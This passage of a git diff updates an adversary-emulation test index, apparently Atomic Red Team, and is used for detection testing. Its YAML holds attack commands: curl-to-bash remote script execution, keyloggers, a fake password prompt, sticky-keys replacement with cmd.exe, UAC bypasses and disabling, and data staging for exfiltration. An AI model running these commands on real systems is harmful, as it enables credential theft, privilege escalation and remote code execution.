is collected prior to exfiltration. This test uses standard zip compression.
-'
+ '
supported_platforms:
- linux
- macos
@@ -8195,11 +8195,11 @@ collection:
dependencies:
- description: 'Files to zip must exist (#{input_files})
-'
+ '
prereq_command: 'if [ $(ls #{input_files} | wc -l) > 0 ] && [ -x $(which zip)
] ; then exit 0; else exit 1; fi;
-'
+ '
get_prereq_command: |
(which yum && yum -y install epel-release zip)||(which apt-get && apt-get install -y zip)
echo Please set input_files argument to include files that exist
@@ -8208,16 +8208,16 @@ collection:
elevation_required: false
command: 'zip #{output_file} #{input_files}
-'
+ '
cleanup_command: 'rm -f #{output_file}
-'
+ '
- name: Data Compressed - nix - gzip Single File
auto_generated_guid: cde3c2af-3485-49eb-9c1f-0ed60e9cc0af
description: 'An adversary may compress data (e.g., sensitive documents) that
is collected prior to exfiltration. This test uses standard gzip compression.
-'
+ '
supported_platforms:
- linux
- macos
@@ -8237,16 +8237,16 @@ collection:
command: 'test -e #{input_file} && gzip -k #{input_file} || (echo ''#{input_content}''
>> #{input_file}; gzip -k #{input_file})
-'
+ '
cleanup_command: 'rm -f #{input_file}.gz
-'
+ '
- name: Data Compressed - nix - tar Folder or File
auto_generated_guid: 7af2b51e-ad1c-498c-aca8-d3290c19535a
description: 'An adversary may compress data (e.g., sensitive documents) that
is collected prior to exfiltration. This test uses standard gzip compression.
-'
+ '
supported_platforms:
- linux
- macos
@@ -8262,28 +8262,28 @@ collection:
dependencies:
- description: 'Folder to zip must exist (#{input_file_folder})
-'
+ '
prereq_command: 'test -e #{input_file_folder}
-'
+ '
get_prereq_command: 'echo Please set input_file_folder argument to a folder
that exists
-'
+ '
executor:
name: sh
elevation_required: false
command: 'tar -cvzf #{output_file} #{input_file_folder}
-'
+ '
cleanup_command: 'rm -f #{output_file}
-'
+ '
- name: Data Encrypted with zip and gpg symmetric
auto_generated_guid: '0286eb44-e7ce-41a0-b109-3da516e05a5f'
description: 'Encrypt data for exiltration
-'
+ '
supported_platforms:
- macos
- linux
@@ -8306,7 +8306,7 @@ collection:
prereq_command: 'if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)"
]; then exit 1; fi;
-'
+ '
get_prereq_command: "(which yum && yum -y install epel-release zip gpg)||(which
apt-get && apt-get install -y zip gpg)\n"
executor:
@@ -8320,7 +8320,7 @@ collection:
ls -l #{test_folder}
cleanup_command: 'rm -Rf #{test_folder}
-'
+ '
T1123:
technique:
object_marking_refs:
@@ -8370,7 +8370,7 @@ collection:
executor:
command: 'powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
-'
+ '
name: powershell
- name: Registry artefact when application use microphone
auto_generated_guid: 7a21cce2-6ada-4f7c-afd9-e1e9c481e44a
@@ -8384,7 +8384,7 @@ collection:
cleanup_command: 'reg DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\NonPackaged\C:#Windows#Temp#atomic.exe
/f
-'
+ '
name: command_prompt
T1119:
technique:
@@ -8454,7 +8454,7 @@ collection:
for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection
cleanup_command: 'del %temp%\T1119_command_prompt_collection /F /Q >nul 2>&1
-'
+ '
name: command_prompt
- name: Automated Collection PowerShell
auto_generated_guid: 634bd9b9-dc83-4229-b19f-7f83ba9ad313
@@ -8470,7 +8470,7 @@ collection:
cleanup_command: 'Remove-Item $env:TEMP\T1119_powershell_collection -Force
-ErrorAction Ignore | Out-Null
-'
+ '
name: powershell
- name: Recon information for export with PowerShell
auto_generated_guid: c3f6d794-50dd-482f-b640-0384fbb7db26
@@ -8619,7 +8619,7 @@ collection:
auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7
description: 'Add data to clipboard to copy off or execute commands from.
-'
+ '
supported_platforms:
- windows
executor:
@@ -8629,14 +8629,14 @@ collection:
clip < %temp%\T1115.txt
cleanup_command: 'del %temp%\T1115.txt >nul 2>&1
-'
+ '
name: command_prompt
- name: Execute Commands from Clipboard using PowerShell
auto_generated_guid: d6dc21af-bec9-4152-be86-326b6babd416
description: 'Utilize PowerShell to echo a command to clipboard and execute
it
-'
+ '
supported_platforms:
- windows
executor:
@@ -8659,7 +8659,7 @@ collection:
description: 'This module copies the data stored in the user''s clipboard and
writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -8671,7 +8671,7 @@ collection:
dependencies:
- description: 'Microsoft #{ms_product} must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -8682,7 +8682,7 @@ collection:
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
-'
+ '
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -8692,7 +8692,7 @@ collection:
cleanup_command: 'Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt"
-ErrorAction Ignore
-'
+ '
name: powershell
T1213.003:
technique:
@@ -8891,7 +8891,7 @@ collection:
auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33
description: 'Hooks functions in PowerShell to read TLS Communications
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -8907,10 +8907,10 @@ collection:
dependencies:
- description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name})
-'
+ '
prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}" -UseBasicParsing
@@ -9283,23 +9283,23 @@ collection:
dependencies:
- description: 'Administrative share must exist on #{remote}
-'
+ '
prereq_command: 'if (Test-Path "\\#{remote}\C$") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host ''Please Enable "C$" share on #{remote}''
-'
+ '
- description: '"\\#{remote}\C$\#{share_file}" must exist on #{remote}
-'
+ '
prereq_command: 'if (Test-Path "\\#{remote}\C$\#{share_file}") {exit 0} else
{exit 1}
-'
+ '
get_prereq_command: 'Out-File -FilePath "\\#{remote}\C$\#{share_file}"
-'
+ '
executor:
command: copy \\#{remote}\C$\#{share_file} %TEMP%\#{local_file}
cleanup_command: |-
@@ -9331,23 +9331,23 @@ collection:
dependencies:
- description: 'Administrative share must exist on #{remote}
-'
+ '
prereq_command: 'if (Test-Path "\\#{remote}\C$") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host ''Please Enable "C$" share on #{remote}''
-'
+ '
- description: '"\\#{remote}\C$\#{share_file}" must exist on #{remote}
-'
+ '
prereq_command: 'if (Test-Path "\\#{remote}\C$\#{share_file}") {exit 0} else
{exit 1}
-'
+ '
get_prereq_command: 'Out-File -FilePath "\\#{remote}\C$\#{share_file}"
-'
+ '
executor:
command: copy-item -Path "\\#{remote}\C$\#{share_file}" -Destination "$Env:TEMP\#{local_file}"
cleanup_command: |-
@@ -9608,7 +9608,7 @@ collection:
to apply changes." & return & return default answer "" with icon 1 with
hidden answer with title "Software Update"''
-'
+ '
name: bash
- name: PowerShell - Prompt User for Password
auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52
@@ -9779,7 +9779,7 @@ collection:
.\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath}
cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore
-'
+ '
name: powershell
elevation_required: true
- name: Living off the land Terminal Input Capture on Linux with pam.d
@@ -9798,14 +9798,14 @@ collection:
dependencies:
- description: 'Checking if pam_tty_audit.so is installed
-'
+ '
prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so''
-'
+ '
get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so
and recompile, for this test to work"
-'
+ '
supported_platforms:
- linux
executor:
@@ -9836,14 +9836,14 @@ collection:
- description: 'This test requires to be run in a bash shell and that logger
and tee are installed.
-'
+ '
prereq_command: |
if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi
if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi
get_prereq_command: 'echo ""
-'
+ '
executor:
name: sh
elevation_required: true
@@ -9853,7 +9853,7 @@ collection:
tail /var/log/syslog
cleanup_command: 'unset PROMPT_COMMAND
-'
+ '
- name: Bash session based keylogger
auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258
description: "When a command is executed in bash, the BASH_COMMAND variable
@@ -9870,14 +9870,14 @@ collection:
dependencies:
- description: 'This test requires to be run in a bash shell
-'
+ '
prereq_command: 'if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n*****
Bash not running! *****\n"; exit 1; fi
-'
+ '
get_prereq_command: 'echo ""
-'
+ '
input_arguments:
output_file:
name: output_file
@@ -9893,7 +9893,7 @@ collection:
cat #{output_file}
cleanup_command: 'rm #{output_file}
-'
+ '
- name: SSHD PAM keylogger
auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca
description: 'Linux PAM (Pluggable Authentication Modules) is used in sshd authentication.
@@ -9901,20 +9901,20 @@ collection:
of TTY input and capture all keystrokes in a ssh session and place them in
the /var/log/audit/audit.log file after the session closes.
-'
+ '
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'This test requires sshd and auditd
-'
+ '
prereq_command: |
if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi
if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
get_prereq_command: 'echo ""
-'
+ '
input_arguments:
user_account:
description: Basic ssh user account for testing.
@@ -9928,7 +9928,7 @@ collection:
restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n"
cleanup_command: 'cp -fv /tmp/sshd /etc/pam.d/
-'
+ '
- name: Auditd keylogger
auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af
description: "The linux audit tool auditd can be used to capture 32 and 64 bit
@@ -9940,14 +9940,14 @@ collection:
dependencies:
- description: 'This test requires sshd and auditd
-'
+ '
prereq_command: 'if [ ! -x "$(command -v auditd)" ]; then echo -e "\n*****
auditd NOT installed *****\n"; exit 1; fi
-'
+ '
get_prereq_command: 'echo ""
-'
+ '
executor:
name: sh
elevation_required: true
@@ -9956,7 +9956,7 @@ collection:
$(date +\"%d/%m/%y %H:%M:%S\") \n"
cleanup_command: 'systemctl restart auditd
-'
+ '
T1557.001:
technique:
object_marking_refs:
@@ -10130,17 +10130,17 @@ collection:
command: 'Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat"
-OutFile #{output_file}
-'
+ '
cleanup_command: 'Remove-Item -Force #{output_file} -ErrorAction Ignore
-'
+ '
name: powershell
- name: Stage data from Discovery.sh
auto_generated_guid: 39ce0303-ae16-4b9e-bb5b-4f53e8262066
description: 'Utilize curl to download discovery.sh and execute a basic information
gathering shell script
-'
+ '
supported_platforms:
- linux
- macos
@@ -10153,7 +10153,7 @@ collection:
command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh
| bash -s > #{output_file}
-'
+ '
name: bash
- name: Zip a Folder with PowerShell for Staging in Temp
auto_generated_guid: a57fbe4b-3440-452a-88a7-943531ac872a
@@ -10175,10 +10175,10 @@ collection:
command: 'Compress-Archive -Path #{input_file} -DestinationPath #{output_file}
-Force
-'
+ '
cleanup_command: 'Remove-Item -Path #{output_file} -ErrorAction Ignore
-'
+ '
name: powershell
T1114.001:
technique:
@@ -10249,23 +10249,23 @@ collection:
dependencies:
- description: 'Get-Inbox.ps1 must be located at #{file_path}
-'
+ '
prereq_command: 'if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit
1}
-'
- get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/src/Get-Inbox.ps1"
+ '
+ get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1114.001/src/Get-Inbox.ps1"
-OutFile "#{file_path}\Get-Inbox.ps1"
-'
+ '
executor:
command: 'powershell -executionpolicy bypass -command #{file_path}\Get-Inbox.ps1
-file #{output_file}
-'
+ '
cleanup_command: 'Remove-Item #{output_file} -Force -ErrorAction Ignore
-'
+ '
name: powershell
T1602.002:
technique:
@@ -10495,7 +10495,7 @@ collection:
or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated
Mac Malware)
-'
+ '
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
kill_chain_phases:
@@ -10530,7 +10530,7 @@ collection:
auto_generated_guid: 0f47ceb1-720f-4275-96b8-21f0562217ac
description: 'Use screencapture command to collect a full desktop screenshot
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -10541,16 +10541,16 @@ collection:
executor:
command: 'screencapture #{output_file}
-'
+ '
cleanup_command: 'rm #{output_file}
-'
+ '
name: bash
- name: Screencapture (silent)
auto_generated_guid: deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4
description: 'Use screencapture command to collect a full desktop screenshot
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -10561,17 +10561,17 @@ collection:
executor:
command: 'screencapture -x #{output_file}
-'
+ '
cleanup_command: 'rm #{output_file}
-'
+ '
name: bash
- name: X Windows Capture
auto_generated_guid: 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac
description: 'Use xwd command to collect a full desktop screenshot and review
file with xwud
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -10593,11 +10593,11 @@ collection:
dependencies:
- description: 'Package with XWD and XWUD must exist on device
-'
+ '
prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit
1; fi
-'
+ '
get_prereq_command: "sudo #{package_installer} \n"
executor:
command: |
@@ -10605,14 +10605,14 @@ collection:
xwud -in #{output_file}
cleanup_command: 'rm #{output_file}
-'
+ '
name: bash
- name: Capture Linux Desktop using Import Tool
auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1
description: 'Use import command from ImageMagick to collect a full desktop
screenshot
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -10623,28 +10623,28 @@ collection:
dependencies:
- description: 'ImageMagick must be installed
-'
+ '
prereq_command: 'if import -help > /dev/null 2>&1; then exit 0; else exit
1; fi
-'
+ '
get_prereq_command: 'sudo apt install graphicsmagick-imagemagick-compat
-'
+ '
executor:
command: 'import -window root #{output_file}
-'
+ '
cleanup_command: 'rm #{output_file}
-'
+ '
name: bash
- name: Windows Screencapture
auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153
description: 'Use Psr.exe binary to collect screenshots of user display. Test
will do left mouse click to simulate user behaviour
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -10666,7 +10666,7 @@ collection:
cmd /c "timeout #{recording_time} > NULL && psr.exe /stop"
cleanup_command: 'rm #{output_file} -ErrorAction Ignore
-'
+ '
- name: Windows Screen Capture (CopyFromScreen)
auto_generated_guid: e9313014-985a-48ef-80d9-cde604ffc187
description: |
@@ -10690,7 +10690,7 @@ collection:
$bitmap.Save("#{output_file}")
cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore
-'
+ '
name: powershell
T1213.002:
technique:
@@ -10807,7 +10807,7 @@ collection:
cleanup_command: 'reg DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\NonPackaged\C:#Windows#Temp#atomic.exe
/f
-'
+ '
name: command_prompt
T1056.003:
technique:
@@ -11095,7 +11095,7 @@ privilege-escalation:
description: 'Comma separated list of system binaries to which you want
to attach each #{attached_process}. Default: "osk.exe"
-'
+ '
type: String
default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe,
atbroker.exe
@@ -11103,7 +11103,7 @@ privilege-escalation:
description: 'Full path to process to attach to target in #{parent_list}.
Default: cmd.exe
-'
+ '
type: Path
default: C:\windows\system32\cmd.exe
executor:
@@ -11137,7 +11137,7 @@ privilege-escalation:
auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3
description: 'Replace sticky keys binary (sethc.exe) with cmd.exe
-'
+ '
supported_platforms:
- windows
executor:
@@ -11148,7 +11148,7 @@ privilege-escalation:
copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe
-'
+ '
name: command_prompt
elevation_required: true
T1547.014:
@@ -11407,11 +11407,11 @@ privilege-escalation:
- description: 'Reg files must exist on disk at specified locations (#{registry_file}
and #{registry_cleanup_file})
-'
+ '
prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file}))
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null
@@ -11420,11 +11420,11 @@ privilege-escalation:
- description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and
T1546.010x86.dll)
-'
+ '
prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll))
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll
@@ -11432,10 +11432,10 @@ privilege-escalation:
executor:
command: 'reg.exe import #{registry_file}
-'
+ '
cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
T1546.011:
@@ -11543,31 +11543,31 @@ privilege-escalation:
- description: 'Shim database file must exist on disk at specified location
(#{file_path})
-'
+ '
prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}"
- description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll
-'
+ '
prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit
1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll
executor:
command: 'sdbinst.exe #{file_path}
-'
+ '
cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: New shim database files created in the default shim database directory
@@ -11780,7 +11780,7 @@ privilege-escalation:
description: 'This test submits a command to be run in the future by the `at`
daemon.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -11796,30 +11796,30 @@ privilege-escalation:
dependencies:
- description: 'The `at` and `atd` executables must exist in the PATH
-'
+ '
prereq_command: 'which at && which atd
-'
+ '
get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found
in the PATH (Package name: `at`)''
-'
+ '
- description: 'The `atd` daemon must be running
-'
+ '
prereq_command: 'systemctl status atd || service atd status
-'
+ '
get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service
atd start` ; systemd: `systemctl start atd`)''
-'
+ '
executor:
name: sh
elevation_required: false
command: 'echo "#{at_command}" | at #{time_spec}
-'
+ '
T1053.002:
technique:
object_marking_refs:
@@ -11916,7 +11916,7 @@ privilege-escalation:
elevation_required: false
command: 'at 13:20 /interactive cmd
-'
+ '
T1547.002:
technique:
object_marking_refs:
@@ -12082,7 +12082,7 @@ privilege-escalation:
auto_generated_guid: cb01b3da-b0e7-4e24-bf6d-de5223526785
description: 'Install a driver via pnputil.exe lolbin
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -12093,7 +12093,7 @@ privilege-escalation:
executor:
command: 'pnputil.exe /add-driver "#{driver_inf}"
-'
+ '
name: command_prompt
T1037:
technique:
@@ -12263,7 +12263,7 @@ privilege-escalation:
cmd.exe /c eventvwr.msc
cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1
-'
+ '
name: command_prompt
- name: Bypass UAC using Event Viewer (PowerShell)
auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b
@@ -12285,7 +12285,7 @@ privilege-escalation:
cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse
-ErrorAction Ignore
-'
+ '
name: powershell
- name: Bypass UAC using Fodhelper
auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182
@@ -12307,7 +12307,7 @@ privilege-escalation:
cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul
2>&1
-'
+ '
name: command_prompt
- name: Bypass UAC using Fodhelper - PowerShell
auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa
@@ -12330,7 +12330,7 @@ privilege-escalation:
cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
-Recurse -ErrorAction Ignore
-'
+ '
name: powershell
- name: Bypass UAC using ComputerDefaults (PowerShell)
auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f
@@ -12353,7 +12353,7 @@ privilege-escalation:
cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
-Recurse -ErrorAction Ignore
-'
+ '
name: powershell
elevation_required: true
- name: Bypass UAC by Mocking Trusted Directories
@@ -12401,7 +12401,7 @@ privilege-escalation:
cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse
-Force -ErrorAction Ignore
-'
+ '
name: powershell
- name: Disable UAC using reg.exe
auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9
@@ -12414,11 +12414,11 @@ privilege-escalation:
command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
/v EnableLUA /t REG_DWORD /d 0 /f
-'
+ '
cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
/v EnableLUA /t REG_DWORD /d 1 /f
-'
+ '
name: command_prompt
elevation_required: true
- name: Bypass UAC using SilentCleanup task
@@ -12465,7 +12465,7 @@ privilege-escalation:
dependencies:
- description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
-'
+ '
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
@@ -12476,7 +12476,7 @@ privilege-escalation:
executor:
command: '"#{uacme_exe}"
-'
+ '
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
@@ -12501,7 +12501,7 @@ privilege-escalation:
dependencies:
- description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
-'
+ '
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
@@ -12512,7 +12512,7 @@ privilege-escalation:
executor:
command: '"#{uacme_exe}"
-'
+ '
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
@@ -12536,7 +12536,7 @@ privilege-escalation:
dependencies:
- description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
-'
+ '
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
@@ -12547,7 +12547,7 @@ privilege-escalation:
executor:
command: '"#{uacme_exe}"
-'
+ '
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
@@ -12572,7 +12572,7 @@ privilege-escalation:
dependencies:
- description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
-'
+ '
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
@@ -12583,7 +12583,7 @@ privilege-escalation:
executor:
command: '"#{uacme_exe}"
-'
+ '
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
@@ -12607,7 +12607,7 @@ privilege-escalation:
dependencies:
- description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
-'
+ '
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
@@ -12618,7 +12618,7 @@ privilege-escalation:
executor:
command: '"#{uacme_exe}"
-'
+ '
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
@@ -12642,7 +12642,7 @@ privilege-escalation:
dependencies:
- description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
-'
+ '
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
@@ -12653,7 +12653,7 @@ privilege-escalation:
executor:
command: '"#{uacme_exe}"
-'
+ '
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
@@ -12678,7 +12678,7 @@ privilege-escalation:
dependencies:
- description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
-'
+ '
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
@@ -12689,7 +12689,7 @@ privilege-escalation:
executor:
command: '"#{uacme_exe}"
-'
+ '
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
@@ -12714,7 +12714,7 @@ privilege-escalation:
dependencies:
- description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
-'
+ '
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
@@ -12725,7 +12725,7 @@ privilege-escalation:
executor:
command: '"#{uacme_exe}"
-'
+ '
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
@@ -12839,7 +12839,7 @@ privilege-escalation:
- description: "#{file_name} must be present\n"
prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -12884,7 +12884,7 @@ privilege-escalation:
- description: "#{file_name} must be present\n"
prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -12922,7 +12922,7 @@ privilege-escalation:
- description: "#{file_name} must be present\n"
prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -13039,10 +13039,10 @@ privilege-escalation:
executor:
command: 'assoc #{extension_to_change}=#{target_extension_handler}
-'
+ '
cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler}
-'
+ '
name: command_prompt
elevation_required: true
T1078.004:
@@ -13111,7 +13111,7 @@ privilege-escalation:
description: 'GCP Service Accounts can be used to gain intial access as well
as maintain persistence inside Google Cloud.
-'
+ '
supported_platforms:
- google-workspace
- windows
@@ -13146,20 +13146,20 @@ privilege-escalation:
cleanup_command: 'gcloud iam service-accounts delete #{service-account-email}
--quiet
-'
+ '
dependency_executor_name: gcloud
dependencies:
- description: 'Requires gcloud
-'
+ '
prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'echo "Please Install Google Cloud SDK before running
this atomic test : https://cloud.google.com/sdk/docs/install"
-'
+ '
T1546.015:
technique:
object_marking_refs:
@@ -13290,7 +13290,7 @@ privilege-escalation:
$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)
cleanup_command: 'Get-Process -Name "*calc" | Stop-Process
-'
+ '
name: powershell
T1053.007:
technique:
@@ -13359,7 +13359,7 @@ privilege-escalation:
CronJob for scheduling execution of malicious code that would run as a container
in the cluster.
-'
+ '
supported_platforms:
- containers
input_arguments:
@@ -13370,17 +13370,17 @@ privilege-escalation:
dependencies:
- description: 'kubectl must be installed
-'
+ '
